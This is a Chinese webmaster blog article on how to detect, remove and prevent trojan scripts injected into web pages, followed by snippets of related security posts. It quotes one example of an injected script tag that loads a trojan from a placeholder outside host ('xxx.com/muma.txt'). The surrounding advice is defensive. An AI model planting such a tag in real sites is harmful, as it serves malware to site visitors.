Categories


Tags


如何预防和检测网页挂马?

在网站优化设计当中,检测网页木马也是很重要的一项工作,目前流行的网站被黑,是在相应的asp,htm,js等文件中,插入以js调用方式的。本文主要介绍网页挂马的种类、如何检测网页是否被挂马、如何清除网页木马。如何防止网页被挂马。

1:网页挂马的种类.

目前流行的网站被黑,是在相应的asp,htm,js等文件中,插入以js调用方式的。更详细的资料,请点击查看挂马代码大全。

卢松松以前做过的‘极品源码下载站’就遇到过JS挂马

<SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script>

&lsquo;校园闹翻天论坛&rsquo;就遇到用户提权,利用动网程序漏洞(上传附件漏洞)拥有网站管理员权限。删了论坛几千条数据,一千多位会员的ID

2:如何检测网页是否被挂马。

(1):专业检测工具,六款免费网页安全检测工具横向测评(华军软件园)点此进入

(2):Google检测,或者可以利用Google搜索你的网站、博客进行检测。如果有网站有木马则google会在搜索列表的下方提示该网站有不安全因素。

(3):杀毒软件检测,常用的杀毒软件也可以检测出来。

(4):人工检测,打开你的网站、博客,点击右键查看源文件,根据网页挂马的种类也可以查看是否中了木马。

(5):使用McAfee SiteAdvisor安全浏览网页的插件。例:检测卢松松博客是否安全可点此查看。

如何预防和检测网页挂马? 网站安全 SEO推广 第1张

3:如何清除网页木马。

一旦中了网页木马,就看那些文件是最近修改过的,主要查看这些新文件,(从FTP中可以查看文件最近修改时间。)然后进入源文件把相关的网页挂马种类的可疑代码删除。

如果你对你所使用的网站、博客程序不熟悉,建议删除所有文件(数据库、图片、文档、程序模板主题等文件夹可以保留)

4:如何防止网页被挂马。如果你的网站还没有被挂马,请从预防开始吧。

(1):对网友开放上传附件功能的网站一定要进行身份认证,并只允许信任的人使用上传程序。

(2):保证你所使用的程序及时的更新。

(3):不要在前台网页上加注后台管理程序登陆页面的链接。

(4):要时常备份数据库等重要文件,但不要把备份数据库放在程序默认的备份目录下。

(5):管理员的用户名和密码要有一定复杂性,不能过于简单。

(6):IIS中禁止写入和目录禁止执行的功能,二项功能组合,可以有效的防止ASP木马。

(7):可以在服务器、虚拟主机控制面板,设置执行权限选项中,直接将有上传权限的目录,取消ASP的运行权限。

(8):创建一个robots.txt上传到网站根目录。Robots能够有效的防范利用搜索引擎窃取信息的骇客。 点此查看robots.txt使用方法。

来源:卢松松博客


Public @ 2014-10-23 15:37:43

关于百度“判罚”的谣言

江湖一直对“百度判罚”有种种猜测,现在,学堂君整理了站长们最关心的几种情况,请专业技术工程师回答,这些情况是否会影响搜索对网站的质量判断Q:网站被镜像,是否会引起百度判罚?A:被镜像站点不会被百度判罚;百度有策略识别并判罚镜像站点,另可参考学堂文章《网站被镜像,如何向百度投诉?》Q:有人给我的网站做大量垃圾外链&黑链,是否会引起百度判罚 ?A:百度会自动过滤垃圾外链&黑链,一般不会

Public @ 2011-07-19 15:56:36

HTTPS的工作原理,哪些网站适合使用HTTPS?

HTTPS是建立一个信息安全通道,来保证数据传输的安全,有效保障用户隐私数据,截取也无法解密。一般来说,HTTPS 主要用途有三个:一是通过证书等信息确认网站的真实性;二是建立加密的信息通道;三是数据内容的完整性。HTTPS的工作原理HTTPS在 HTTP 传输协议的基础上对网站进行认证,给予它独一无二的身份证明,再对网站数据进行加密,并对传输的数据进行完整性验证。比如:① 当你访问HTTPS的网

Public @ 2023-01-14 15:56:08

[分享]云服务器挂马清理实例

今天,我们将为大家介绍云服务器挂马清理实例,一起来看看吧! 一、准备工作 1、购买云服务器,选择可信任的服务商,以及安全健壮的系统镜像。 2、开启安全日记功能,让系统记录每一个对系统的行为,以便发现系统异常行为。 3、在使用云服务器之前Enable访问安全策略,限制访问IP。 4、安装安全软件,进行持续的病毒扫描,同时更新众多安全补丁。 二、清理被挂马文件 1、如果发现被挂马文件,则Mer

Public @ 2023-02-24 09:48:46

云服务器批量删除挂马

云服务器批量删除挂马可以按照以下步骤进行: 1. 首先,你需要登录到云服务器的控制面板或使用SSH连接到云服务器。 2. 确认是否存在挂马,可以通过查看日志、扫描病毒、检查系统文件等方式来判断。 3. 如果确认存在挂马,可以使用杀毒软件进行清理,或者手动删除挂马相关的文件、进程等。 4. 如果需要批量删除挂马,可以编写脚本来实现自动化操作,例如使用Python脚本、Shell脚本等。 5

Public @ 2023-03-27 09:00:14

更多您感兴趣的搜索

0.402923s